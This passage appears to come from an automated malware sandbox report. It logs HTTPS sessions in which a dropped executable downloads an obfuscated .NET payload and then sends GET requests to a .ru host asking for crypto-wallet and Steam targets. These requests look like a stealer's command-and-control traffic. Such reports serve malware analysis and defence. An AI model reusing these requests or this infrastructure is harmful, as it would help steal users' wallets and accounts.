2023-11-18 09:03:00 UTC	10577	IN	Data Raw: 09 6c 00 fd 11 00 00 42 02 49 01 b8 14 00 00 f6 02 b9 01 fd 11 00 00 42 02 7c 00 fd 11 00 00 9e 05 89 01 99 17 00 00 e7 09 84 00 fd 11 00 00 9e 05 89 01 3b 15 00 00 21 0a 89 01 e4 16 00 00 4b 0a 8c 00 fd 11 00 00 9e 05 94 00 f4 0b 00 00 7a 0a 59 01 24 0c 00 00 84 0a b9 01 b9 17 00 00 80 04 c9 01 63 13 00 00 8b 0a d1 01 7c 17 00 00 92 0a f1 01 9c 0b 00 00 aa 02 29 00 c5 0b 00 00 b0 0a 89 01 bf 14 00 00 bb 0a 9c 00 fd 11 00 00 9e 05 89 01 b9 17 00 00 d4 0a 49 01 fd 11 00 00 e5 0a 11 00 fd 11 00 00 42 02 b9 01 fd 11 00 00 b3 03 f9 01 42 15 00 00 0f 02 f9 01 37 14 00 00 0f 02 89 01 b8 14 00 00 f8 0a a4 00 fd 11 00 00 42 02 6c 00 b8 11 00 00 20 0b ac 00 53 16 00 00 13 02 b4 00 fd 11 00 00 9e 05 a4 00 ff 04 00 00 9a 09 ac 00 1d 17 00 00 5a 05 74 00 ff 04 00 00 Data Ascii: lBIB\|;!KzY$c\|)IBB7Bl SZt
2023-11-18 09:03:00 UTC	10578	IN	Data Raw: 00 00 9e 05 34 01 fd 11 00 00 9e 05 3c 01 fd 11 00 00 9e 05 89 01 32 18 00 00 e4 0f 44 01 fd 11 00 00 9e 05 4c 01 fd 11 00 00 9e 05 29 00 c5 0b 00 00 95 10 89 01 08 10 00 00 9d 10 89 01 46 06 00 00 9d 10 54 01 fd 11 00 00 9e 05 cc 00 4e 06 00 00 c9 09 64 00 4e 06 00 00 c9 09 91 02 6f 18 00 00 f9 10 01 03 3d 11 00 00 ff 10 09 03 fd 11 00 00 ec 04 99 00 c2 06 00 00 06 11 01 03 0a 11 00 00 0e 11 49 01 1e 14 00 00 17 11 b1 01 bc 0b 00 00 2e 02 21 03 2e 05 00 00 27 11 64 01 fd 11 00 00 42 02 64 01 fd 11 00 00 ec 04 b1 00 d9 04 00 00 97 03 64 01 ff 04 00 00 9a 09 49 01 cc 14 00 00 53 11 6c 01 4e 06 00 00 13 02 41 03 22 18 00 00 71 11 41 03 40 13 00 00 79 11 74 01 05 00 00 00 db 01 74 01 b4 03 00 00 d2 01 74 01 cb d2 00 00 38 06 7c 01 fd 11 00 00 9e 05 74 01 2d Data Ascii: 4<2DL)FTNdNo=I.!.'dBddISlNA"qA@yttt8\|t-
2023-11-18 09:03:00 UTC	10582	IN	Data Raw: 0b 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 60 07 00 00 00 00 00 00 00 00 2e 00 05 00 2f 00 05 00 30 00 05 00 31 00 07 00 32 00 07 00 33 00 08 00 34 00 0a 00 35 00 0a 00 36 00 0b 00 37 00 0b 00 38 00 0b 00 39 00 0c 00 3a 00 0c 00 3b 00 0c 00 3c 00 0c 00 3d 00 0e 00 3e 00 0e 00 3f 00 0e 00 40 00 0e 00 41 00 0f 00 42 00 10 00 43 00 10 00 44 00 11 00 45 00 11 00 46 00 12 00 47 00 12 00 48 00 12 00 49 00 16 00 4a 00 16 00 4b 00 16 00 4c 00 16 00 4d 00 16 00 4e 00 1a 00 4f 00 1a 00 50 00 1a 00 51 00 1c 00 52 00 1d 00 53 00 1d 00 54 00 1d 00 55 00 1d 00 56 00 1e 00 57 00 1e 00 58 00 1f 00 59 00 1f 00 5a 00 1f 00 5b 00 1f 00 5c 00 1f 00 5d 00 1f 00 5e 00 1f 00 5f 00 1f 00 60 00 20 00 61 00 20 00 62 00 20 00 63 00 21 00 64 00 26 00 65 00 Data Ascii: `./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_` a b c!d&e
2023-11-18 09:03:00 UTC	10586	IN	Data Raw: 72 65 73 73 69 6f 6e 00 53 79 73 74 65 6d 2e 4e 65 74 2e 4e 65 74 77 6f 72 6b 49 6e 66 6f 72 6d 61 74 69 6f 6e 00 70 73 7a 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 49 6e 70 75 74 4c 61 6e 67 75 61 67 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 4d 61 74 63 68 43 6f 6c 6c 65 63 74 69 6f 6e 00 4d 61 6e 61 67 65 6d 65 6e 74 4f 62 6a 65 63 74 43 6f 6c 6c 65 63 74 69 6f 6e 00 67 65 74 5f 50 6f 73 69 74 69 6f 6e 00 73 65 74 5f 50 6f 73 69 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 44 69 72 65 63 74 6f 72 79 4e 6f 74 46 6f 75 6e 64 45 78 63 65 70 74 69 6f 6e 00 50 61 74 Data Ascii: ressionSystem.Net.NetworkInformationpszImplementationSystem.GlobalizationSystem.ReflectionInputLanguageCollectionMatchCollectionManagementObjectCollectionget_Positionset_PositionWin32ExceptionNotSupportedExceptionDirectoryNotFoundExceptionPat
2023-11-18 09:03:00 UTC	10590	IN	Data Raw: 81 ae e2 81 ab e2 80 8d e2 80 ab e2 80 ac e2 81 ae e2 81 ab e2 80 ac e2 80 8f e2 80 8c e2 80 8c e2 81 ab e2 81 af e2 81 af e2 80 ab e2 81 ac e2 80 ad e2 80 ac e2 81 ae e2 80 8f e2 80 8c e2 80 ae 00 e2 81 ab e2 81 ad e2 81 ab e2 81 ab e2 80 8d e2 80 8f e2 81 aa e2 81 aa e2 81 aa e2 80 ae e2 81 ac e2 80 ae e2 80 8d e2 80 8e e2 80 8b e2 81 ab e2 80 ac e2 81 ae e2 81 ab e2 80 ac e2 81 af e2 80 8d e2 80 8c e2 80 8e e2 81 af e2 80 8c e2 80 ae e2 81 ac e2 80 8e e2 81 ae e2 80 ae e2 81 aa e2 81 ac e2 80 ac e2 80 ad e2 80 8f e2 81 ad e2 81 ad e2 80 aa e2 80 8c e2 80 ae 00 e2 81 af e2 81 ac e2 80 8d e2 80 ac e2 81 af e2 80 aa e2 81 ae e2 80 8c e2 80 ad e2 80 8c e2 81 ac e2 81 af e2 81 af e2 81 ac e2 80 ac e2 81 ac e2 80 ae e2 80 ac e2 81 ac e2 80 ad e2 80 8e e2 80 Data Ascii:
2023-11-18 09:03:00 UTC	10594	IN	Data Raw: ad e2 80 ab e2 80 ad e2 80 8f e2 80 ad e2 81 ab e2 81 ad e2 80 8d e2 80 8f e2 80 8e e2 81 ab e2 80 8e e2 81 ad e2 80 8d e2 80 ae 00 e2 80 8c e2 80 8e e2 80 8b e2 80 8e e2 80 8b e2 81 ac e2 81 ab e2 81 af e2 80 ac e2 80 ab e2 80 ac e2 81 ad e2 80 8c e2 80 8c e2 80 8c e2 80 ab e2 80 8c e2 80 ac e2 80 8f e2 80 ab e2 81 af e2 80 8e e2 81 ab e2 81 ab e2 80 ac e2 80 8f e2 80 8e e2 81 ac e2 80 8d e2 80 aa e2 80 ac e2 80 aa e2 80 ad e2 80 8e e2 80 aa e2 81 ad e2 80 ad e2 80 8f e2 81 ad e2 80 8d e2 80 ae 00 e2 80 ac e2 80 ac e2 81 ab e2 81 af e2 80 8e e2 81 af e2 80 8f e2 80 ab e2 80 8f e2 81 ad e2 81 ad e2 80 ac e2 81 aa e2 80 8f e2 80 8e e2 80 8e e2 80 8e e2 80 8e e2 81 af e2 80 ac e2 80 8b e2 81 ac e2 81 ab e2 80 ac e2 80 8b e2 81 ad e2 80 8c e2 80 ac e2 81 ab Data Ascii:
2023-11-18 09:03:00 UTC	10598	IN	Data Raw: e2 81 aa e2 80 ab e2 81 ac e2 80 ab e2 80 8d e2 81 ac e2 80 8e e2 80 ae 00 e2 80 8c e2 80 8d e2 80 ae e2 81 ad e2 80 8d e2 80 8e e2 81 ae e2 80 8e e2 80 aa e2 80 8d e2 80 ac e2 80 8e e2 80 8f e2 80 ab e2 81 ae e2 80 ad e2 81 ac e2 80 8f e2 81 ae e2 81 af e2 81 ad e2 81 ad e2 80 8e e2 80 8c e2 80 ac e2 80 ac e2 80 8b e2 80 ab e2 80 8d e2 80 ac e2 80 8d e2 80 aa e2 80 8b e2 81 ac e2 81 ac e2 80 8b e2 81 af e2 80 8e e2 81 ac e2 80 8e e2 80 ae 00 e2 80 ac e2 80 8d e2 81 af e2 80 ac e2 81 ac e2 81 ac e2 80 ad e2 80 8d e2 80 8e e2 80 aa e2 80 8b e2 81 af e2 80 8f e2 80 8b e2 80 8c e2 80 8d e2 80 ac e2 81 af e2 81 ac e2 81 ad e2 80 8b e2 80 8b e2 80 8d e2 80 8f e2 81 ab e2 80 8c e2 81 ae e2 80 8e e2 80 8b e2 81 aa e2 80 8d e2 81 aa e2 80 ac e2 81 ae e2 80 ae e2 Data Ascii:
2023-11-18 09:03:00 UTC	10602	IN	Data Raw: e2 81 aa e2 80 ae e2 80 8c e2 81 ac e2 80 8e e2 80 aa e2 80 ae e2 80 8f e2 81 ac e2 81 ad e2 81 ab e2 80 aa e2 80 8d e2 81 ae e2 80 8b e2 80 ae e2 81 ad e2 80 8f e2 80 ae e2 81 ad e2 80 8d e2 80 ab e2 80 8c e2 80 8c e2 81 ac e2 80 ae e2 80 aa e2 80 8f e2 80 aa e2 80 ae e2 80 8d e2 80 8b e2 80 8b e2 81 ab e2 81 af e2 81 ab e2 81 ae e2 80 ac e2 81 ab e2 80 8f e2 80 ae 00 e2 81 af e2 81 ad e2 80 aa e2 80 8d e2 81 ab e2 81 ac e2 80 8d e2 80 8e e2 80 ae e2 80 8e e2 81 ac e2 80 8f e2 81 ab e2 80 8f e2 81 ae e2 80 ab e2 80 ad e2 81 ab e2 80 ad e2 80 ad e2 81 ae e2 81 af e2 80 ae e2 80 8d e2 80 ad e2 80 8c e2 80 8e e2 81 ae e2 80 8c e2 80 ab e2 80 8c e2 80 8c e2 81 ae e2 81 ae e2 80 ac e2 81 af e2 80 8e e2 80 ad e2 81 ab e2 80 8f e2 80 ae 00 e2 81 ab e2 81 ab e2 Data Ascii:
2023-11-18 09:03:00 UTC	10607	IN	Data Raw: 81 ab e2 80 8b e2 80 ad e2 80 8e e2 80 ae e2 81 ad e2 81 ac e2 81 ab e2 80 8c e2 80 aa e2 80 aa e2 80 8d e2 80 8c e2 80 ae e2 80 ae e2 80 aa e2 80 ae e2 81 ad e2 81 ad e2 81 af e2 80 ad e2 81 ab e2 80 8d e2 81 ab e2 80 ac e2 80 ad e2 81 ad e2 81 ae e2 80 8d e2 81 af e2 80 8f e2 81 ac e2 81 aa e2 80 ab e2 80 aa e2 80 ae 00 e2 81 ab e2 80 8d e2 81 ae e2 80 8e e2 81 ac e2 80 8d e2 80 8e e2 80 8b e2 80 8c e2 81 ae e2 80 8f e2 80 ac e2 81 af e2 80 ab e2 80 ad e2 80 8e e2 80 ab e2 80 ae e2 80 ab e2 80 8d e2 80 8c e2 81 ac e2 80 aa e2 80 ac e2 80 8d e2 81 ad e2 81 ac e2 81 ae e2 80 ae e2 81 aa e2 80 8b e2 80 ac e2 81 ad e2 81 aa e2 81 ad e2 80 ac e2 81 ae e2 80 ab e2 80 aa e2 80 ae 00 e2 80 ac e2 80 8e e2 80 8d e2 80 ab e2 81 ae e2 81 ae e2 81 aa e2 80 8d e2 81 Data Ascii:
2023-11-18 09:03:00 UTC	10610	IN	Data Raw: e2 81 ad e2 80 aa e2 80 8e e2 80 ae e2 80 8e e2 81 aa e2 80 ae 00 e2 80 ae e2 81 ac e2 80 aa e2 81 af e2 81 ab e2 80 ae e2 81 ae e2 80 ad e2 80 8f e2 81 ac e2 81 ae e2 80 aa e2 80 aa e2 81 ae e2 80 aa e2 80 8b e2 80 aa e2 80 ae e2 80 8c e2 81 ab e2 80 ad e2 81 ae e2 80 aa e2 80 ad e2 80 ac e2 80 8d e2 80 ab e2 81 af e2 81 ad e2 80 8c e2 80 aa e2 80 8d e2 80 8d e2 80 aa e2 81 ab e2 80 8f e2 80 ad e2 80 ae e2 80 8f e2 81 aa e2 80 ae 00 e2 81 af e2 80 ae e2 80 ad e2 80 8e e2 80 ae e2 80 8b e2 80 ab e2 81 af e2 81 af e2 80 ae e2 81 ac e2 81 ad e2 81 aa e2 81 aa e2 80 ab e2 80 8e e2 81 ac e2 81 af e2 81 ae e2 80 8d e2 81 af e2 81 ae e2 80 ab e2 80 aa e2 81 ae e2 80 aa e2 81 ae e2 81 ae e2 81 af e2 80 aa e2 80 ad e2 80 ab e2 80 ae e2 80 ad e2 80 ae e2 81 ad e2 Data Ascii:
2023-11-18 09:03:00 UTC	10614	IN	Data Raw: 80 8f e2 80 ab e2 80 ae 00 e2 80 ab e2 80 aa e2 81 ab e2 80 8d e2 80 aa e2 81 ae e2 80 8d e2 80 ad e2 80 ad e2 80 8e e2 80 8d e2 80 8f e2 80 aa e2 81 ad e2 80 ae e2 80 aa e2 80 ab e2 80 8e e2 81 aa e2 80 ad e2 80 ae e2 81 aa e2 80 8f e2 80 8e e2 80 ae e2 81 ab e2 80 ad e2 80 8c e2 81 ad e2 81 af e2 80 ab e2 81 ab e2 80 8e e2 80 8c e2 81 af e2 81 ac e2 80 8c e2 80 8b e2 81 aa e2 80 ab e2 80 ae 00 e2 80 aa e2 81 ad e2 81 ae e2 80 8c e2 80 8e e2 80 8d e2 80 8f e2 80 ab e2 80 8d e2 81 ac e2 81 ad e2 80 8c e2 81 ab e2 80 ad e2 80 ac e2 81 ab e2 81 ad e2 80 8f e2 80 ab e2 81 af e2 81 ad e2 80 8d e2 80 ac e2 80 8c e2 80 ac e2 80 8d e2 80 8d e2 80 8b e2 81 aa e2 81 aa e2 80 8d e2 80 ae e2 81 ae e2 81 aa e2 81 ad e2 80 ab e2 81 ae e2 80 ad e2 80 ab e2 80 ab e2 80 Data Ascii:
2023-11-18 09:03:00 UTC	10618	IN	Data Raw: 80 ab e2 81 ab e2 81 aa e2 80 8d e2 81 af e2 80 8d e2 80 ae e2 81 aa e2 80 8e e2 80 8b e2 81 ae e2 80 8c e2 80 8e e2 80 ac e2 80 ad e2 81 af e2 80 ad e2 80 8c e2 80 8f e2 80 ad e2 80 8b e2 81 ac e2 80 8b e2 80 aa e2 80 8d e2 80 ae e2 80 8f e2 80 aa e2 80 ad e2 80 ab e2 81 ac e2 80 ab e2 80 ab e2 80 8b e2 80 ae e2 80 8e e2 81 ab e2 80 ae 00 e2 80 8e e2 81 aa e2 81 af e2 80 8e e2 80 ad e2 80 8f e2 81 ae e2 80 8d e2 80 ac e2 80 8b e2 81 ac e2 81 af e2 80 8c e2 81 ac e2 80 ad e2 80 ac e2 80 8b e2 80 ae e2 80 ad e2 81 ab e2 80 8b e2 80 ab e2 81 ab e2 81 ab e2 80 ac e2 80 8c e2 81 aa e2 81 ac e2 80 ae e2 80 8f e2 81 ab e2 80 ab e2 81 aa e2 81 af e2 80 8e e2 80 8f e2 81 aa e2 81 ac e2 80 8f e2 81 ab e2 80 ae 00 e2 81 ac e2 80 8b e2 81 aa e2 80 8f e2 80 ae e2 80 Data Ascii:
2023-11-18 09:03:00 UTC	10622	IN	Data Raw: ad e2 80 8b e2 80 ac e2 80 ab e2 80 aa e2 80 aa e2 80 ac e2 81 ab e2 80 ad e2 81 aa e2 80 8e e2 80 8e e2 80 8d e2 81 af e2 80 ab e2 81 aa e2 80 8f e2 80 ad e2 80 aa e2 80 ab e2 80 8c e2 80 8e e2 80 ac e2 81 ae e2 81 ae e2 81 ab e2 80 8c e2 80 8c e2 80 ac e2 81 aa e2 80 ac e2 80 ae 00 e2 81 aa e2 80 8f e2 81 aa e2 80 8b e2 80 ae e2 80 8d e2 80 8f e2 81 ae e2 80 ab e2 80 ae e2 80 8b e2 81 ae e2 81 ae e2 80 ae e2 80 8d e2 81 ab e2 80 ac e2 80 ae e2 80 ad e2 80 ae e2 80 8b e2 80 ab e2 81 ab e2 81 ae e2 80 ad e2 81 ad e2 81 ab e2 80 ae e2 80 8b e2 80 8d e2 80 8f e2 80 ae e2 80 8c e2 80 aa e2 81 ab e2 80 8c e2 81 ac e2 81 ac e2 81 aa e2 80 ac e2 80 ae 00 e2 80 ad e2 80 ad e2 80 ab e2 80 ae e2 80 ac e2 81 af e2 80 ac e2 80 8d e2 80 ad e2 80 8c e2 81 af e2 81 ae Data Ascii:
2023-11-18 09:03:00 UTC	10626	IN	Data Raw: e2 80 8b e2 81 af e2 80 ab e2 80 ac e2 80 ad e2 81 af e2 80 8b e2 81 ad e2 81 ab e2 81 ac e2 81 aa e2 80 aa e2 81 af e2 80 8b e2 80 8e e2 80 aa e2 81 ab e2 80 ac e2 80 8f e2 81 ae e2 81 aa e2 81 ae e2 80 8c e2 81 ac e2 80 ae 00 e2 80 ab e2 80 ab e2 80 8c e2 81 ad e2 81 ae e2 81 ad e2 81 af e2 81 ae e2 80 ab e2 80 ac e2 80 ab e2 80 8c e2 81 ae e2 81 ad e2 81 aa e2 80 ae e2 80 ae e2 81 ae e2 81 aa e2 80 aa e2 80 ac e2 80 ac e2 81 ad e2 80 aa e2 80 ae e2 81 aa e2 81 ad e2 81 ad e2 81 ad e2 81 ad e2 80 8d e2 80 ac e2 80 8f e2 80 8b e2 81 af e2 80 ac e2 80 8c e2 80 8d e2 80 8d e2 81 ac e2 80 ae 00 e2 80 aa e2 80 aa e2 81 ab e2 81 ab e2 81 ac e2 81 ab e2 80 8d e2 80 ad e2 81 ab e2 80 8b e2 81 af e2 80 ae e2 80 8b e2 81 af e2 81 ab e2 80 ae e2 80 8d e2 81 ab e2 Data Ascii:
2023-11-18 09:03:00 UTC	10630	IN	Data Raw: 80 aa e2 81 af e2 80 ae e2 80 ac e2 80 ad e2 80 8e e2 80 8c e2 81 af e2 80 8f e2 80 aa e2 81 aa e2 80 8b e2 80 ab e2 80 8e e2 80 8d e2 80 aa e2 80 8e e2 80 ad e2 80 ae 00 e2 81 ae e2 80 aa e2 80 8c e2 80 8b e2 80 ab e2 81 ad e2 80 8e e2 81 ac e2 81 aa e2 80 8e e2 80 ad e2 80 8d e2 80 ad e2 81 ad e2 81 ab e2 80 8d e2 80 8b e2 80 ad e2 81 ad e2 80 ab e2 80 8c e2 80 ac e2 81 aa e2 80 ab e2 81 ae e2 80 ac e2 80 ab e2 81 ab e2 81 ac e2 80 ab e2 80 8d e2 80 8c e2 81 ac e2 80 aa e2 80 ab e2 80 ab e2 80 8b e2 80 8c e2 80 8f e2 80 ad e2 80 ae 00 e2 81 ae e2 80 8d e2 80 ab e2 81 ae e2 80 ac e2 80 ac e2 80 ad e2 80 8d e2 80 ae e2 81 aa e2 81 aa e2 80 8f e2 80 ac e2 81 ae e2 80 ad e2 80 8b e2 80 8c e2 81 aa e2 80 ae e2 81 ae e2 81 aa e2 81 af e2 81 ab e2 80 ac e2 81 Data Ascii:
2023-11-18 09:03:00 UTC	10635	IN	Data Raw: 8e e2 80 8e e2 80 ad e2 80 8b e2 80 8d e2 80 8d e2 81 ad e2 80 8e e2 80 ac e2 80 ab e2 81 ad e2 80 ae 00 e2 80 ac e2 80 8b e2 80 ae e2 81 ae e2 81 af e2 80 8b e2 80 8b e2 81 ac e2 80 ac e2 80 aa e2 80 8b e2 81 af e2 80 ad e2 80 8c e2 80 ae e2 81 ad e2 80 8d e2 80 8b e2 80 ad e2 80 aa e2 80 aa e2 80 8f e2 80 ab e2 80 ad e2 81 ad e2 81 af e2 80 8f e2 80 aa e2 81 ac e2 80 8e e2 80 8e e2 80 8b e2 80 ac e2 80 ac e2 81 ab e2 80 8b e2 80 8b e2 81 ae e2 80 ab e2 81 ad e2 80 ae 00 e2 80 ab e2 81 ab e2 80 ad e2 80 ab e2 80 8d e2 81 ad e2 80 8c e2 81 ae e2 80 8f e2 81 ad e2 80 8b e2 80 ab e2 81 ae e2 81 ad e2 80 ae e2 80 8b e2 80 8c e2 80 8d e2 81 ac e2 80 8b e2 80 8d e2 81 af e2 81 af e2 80 ac e2 80 ac e2 81 ac e2 80 8f e2 80 8b e2 81 ae e2 81 ab e2 80 ab e2 80 ab Data Ascii:
2023-11-18 09:03:00 UTC	10639	IN	Data Raw: e2 81 aa e2 80 ac e2 80 ab e2 80 ae e2 80 ae 00 e2 81 ad e2 81 ae e2 81 ad e2 80 8f e2 80 8e e2 80 ab e2 80 ac e2 81 ae e2 80 8c e2 80 ae e2 81 ab e2 80 ad e2 81 af e2 80 8b e2 81 ac e2 80 8e e2 81 aa e2 80 8b e2 80 ab e2 81 aa e2 80 8d e2 81 aa e2 80 8e e2 81 ab e2 81 af e2 80 ac e2 81 af e2 80 8b e2 80 ae e2 81 aa e2 81 aa e2 81 ae e2 80 ad e2 80 ac e2 80 ad e2 81 af e2 81 ae e2 80 8b e2 81 ab e2 80 ae e2 80 ae 00 e2 81 ae e2 80 ac e2 80 8c e2 81 aa e2 81 ab e2 80 8b e2 80 ab e2 80 ab e2 80 ab e2 80 8c e2 81 aa e2 81 af e2 81 ae e2 81 af e2 81 aa e2 81 af e2 80 8c e2 80 8d e2 80 ab e2 80 ab e2 80 ad e2 81 af e2 80 8c e2 81 ab e2 80 ab e2 80 ad e2 80 ad e2 80 aa e2 81 af e2 80 ae e2 80 ac e2 81 aa e2 80 8e e2 80 8f e2 80 8b e2 80 ab e2 80 aa e2 80 ab e2 Data Ascii:
2023-11-18 09:03:00 UTC	10642	IN	Data Raw: 80 8f e2 80 aa e2 81 ac e2 81 ac e2 81 aa e2 80 8b e2 80 8e e2 81 ab e2 80 ab e2 80 ad e2 80 ae e2 81 ae e2 80 ae e2 81 ab e2 80 8d e2 80 8b e2 81 aa e2 80 ab e2 81 ae e2 80 aa e2 81 aa e2 80 8d e2 81 ae e2 80 ae 00 e2 80 8c e2 80 ab e2 80 8e e2 80 ae e2 81 aa e2 81 ac e2 80 8f e2 80 8c e2 80 aa e2 81 ae e2 80 ad e2 80 ac e2 81 ac e2 80 8e e2 81 ae e2 81 ad e2 80 8c e2 81 ae e2 80 ad e2 80 ac e2 81 af e2 81 ab e2 80 ac e2 80 8e e2 81 ab e2 81 aa e2 80 ab e2 81 aa e2 81 ab e2 80 ad e2 81 ad e2 81 ab e2 80 ac e2 80 ae e2 81 ad e2 81 ab e2 80 8e e2 80 8b e2 80 8e e2 81 ae e2 80 ae 00 e2 80 ae e2 80 8e e2 81 ab e2 80 8d e2 80 aa e2 80 ae e2 81 af e2 80 8c e2 81 ac e2 80 ae e2 80 ab e2 80 ab e2 80 8d e2 81 af e2 80 ad e2 80 ac e2 81 ac e2 80 8d e2 81 ac e2 81 Data Ascii:
2023-11-18 09:03:00 UTC	10646	IN	Data Raw: 8f e2 80 aa e2 80 8b e2 80 aa e2 80 ab e2 80 8c e2 80 aa e2 80 8f e2 81 ab e2 80 ae e2 80 8d e2 80 8c e2 81 ac e2 80 aa e2 81 ae e2 81 ae e2 80 8c e2 81 ae e2 81 ae e2 80 ae 00 e2 80 ab e2 80 8d e2 80 ab e2 80 aa e2 81 aa e2 80 aa e2 80 8f e2 80 8c e2 80 8c e2 80 ae e2 80 aa e2 81 ad e2 81 af e2 80 aa e2 80 8b e2 81 aa e2 81 ac e2 80 ae e2 80 ad e2 80 8f e2 80 ac e2 80 ae e2 80 8c e2 81 ae e2 80 8f e2 80 8c e2 80 8d e2 80 ae e2 81 ab e2 80 8b e2 81 aa e2 80 ab e2 81 ae e2 80 8f e2 81 ad e2 80 ab e2 80 ae e2 80 8d e2 81 af e2 81 ae e2 80 ae 00 e2 80 ac e2 81 ad e2 80 ac e2 81 ad e2 81 aa e2 81 ae e2 81 ad e2 81 aa e2 80 8d e2 80 ab e2 80 ad e2 80 aa e2 81 ac e2 80 8b e2 80 ac e2 80 ae e2 81 ab e2 80 ad e2 80 8e e2 80 ab e2 80 8b e2 80 ae e2 80 8d e2 81 ab Data Ascii:
2023-11-18 09:03:00 UTC	10650	IN	Data Raw: e2 81 af e2 80 aa e2 80 ac e2 80 ac e2 81 ad e2 81 ab e2 80 8d e2 81 ad e2 80 ad e2 80 8d e2 80 aa e2 81 af e2 81 af e2 80 ae 00 e2 80 8c e2 81 ab e2 81 ac e2 80 ac e2 81 af e2 81 af e2 81 aa e2 80 ab e2 80 ad e2 80 aa e2 80 8d e2 80 8b e2 81 af e2 80 8f e2 80 ac e2 80 ab e2 80 8e e2 80 ae e2 80 8e e2 80 ab e2 80 8e e2 80 8d e2 80 ab e2 81 ad e2 80 8c e2 80 8f e2 80 8d e2 80 ac e2 80 8b e2 80 8c e2 80 ad e2 81 ae e2 81 ac e2 80 aa e2 81 af e2 81 ae e2 80 aa e2 81 aa e2 81 af e2 81 af e2 80 ae 00 e2 80 8f e2 80 aa e2 81 ab e2 81 aa e2 80 ab e2 80 8b e2 80 8c e2 81 aa e2 80 ad e2 80 ab e2 80 ac e2 80 8e e2 81 ab e2 80 8d e2 81 ac e2 80 8d e2 80 ab e2 80 ad e2 80 ae e2 80 aa e2 81 ad e2 80 8d e2 80 8d e2 81 ab e2 81 ae e2 80 ac e2 81 ab e2 80 8d e2 81 ad e2 Data Ascii:
2023-11-18 09:03:00 UTC	10655	IN	Data Raw: 81 14 1d 05 06 00 03 1c 0e 0e 1c 10 07 08 11 81 18 1d 0e 08 0e 12 81 20 0e 1d 0e 08 07 07 02 12 81 1c 1d 05 08 20 02 1d 05 12 81 69 0e 08 07 03 12 64 0e 12 80 c1 04 06 12 81 6d 06 20 01 12 81 6d 0e 04 20 00 1d 0e 0b 07 06 12 81 6d 1d 0e 08 0e 0e 0e 0b 15 12 21 02 0e 15 12 08 02 0e 0e 09 0a 02 0e 15 12 08 02 0e 0e 10 15 12 21 02 15 12 08 02 0e 0e 15 12 35 01 12 41 18 15 12 45 03 15 12 08 02 0e 0e 12 41 15 12 0c 02 15 12 08 02 0e 0e 12 41 25 10 03 03 15 12 35 01 1e 02 15 12 35 01 1e 00 15 12 21 02 1e 00 15 12 35 01 1e 01 15 12 45 03 1e 00 1e 01 1e 02 16 0a 03 15 12 08 02 0e 0e 12 41 15 12 0c 02 15 12 08 02 0e 0e 12 41 21 15 12 21 02 15 12 0c 02 15 12 08 02 0e 0e 12 41 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 12 41 0e 1f 0a 02 15 12 0c 02 15 12 08 02 0e 0e Data Ascii: idm m m!!5AEAA%55!5EAA!!AA

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	104.21.89.193	443	192.168.2.4	49790	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:00 UTC	10659	OUT	GET /getwallet.php?id=1444&wallet=dash HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:01 UTC	10659	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9dGAL4Qb%2BcuHzxymZFrwFN3QmjPN%2BJqh3%2BNobf5RTamZ1Oeu1vTvPygo6x6G3NQT%2FQWWmqS5P1TdsGI6I5y9ygN8z5De4qlwXhpzJReLwSIvey5pEY12PUuZ4IB16ZLEZPlr3Jua"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09af2b2dc37a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:01 UTC	10659	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49790	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:00 UTC	10659	OUT	GET /getwallet.php?id=1444&wallet=dash HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:01 UTC	10659	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9dGAL4Qb%2BcuHzxymZFrwFN3QmjPN%2BJqh3%2BNobf5RTamZ1Oeu1vTvPygo6x6G3NQT%2FQWWmqS5P1TdsGI6I5y9ygN8z5De4qlwXhpzJReLwSIvey5pEY12PUuZ4IB16ZLEZPlr3Jua"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09af2b2dc37a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:01 UTC	10659	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49791	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:01 UTC	10659	OUT	GET /getwallet.php?id=1444&wallet=steam HTTP/1.1 Host: central-cee-doja.ru
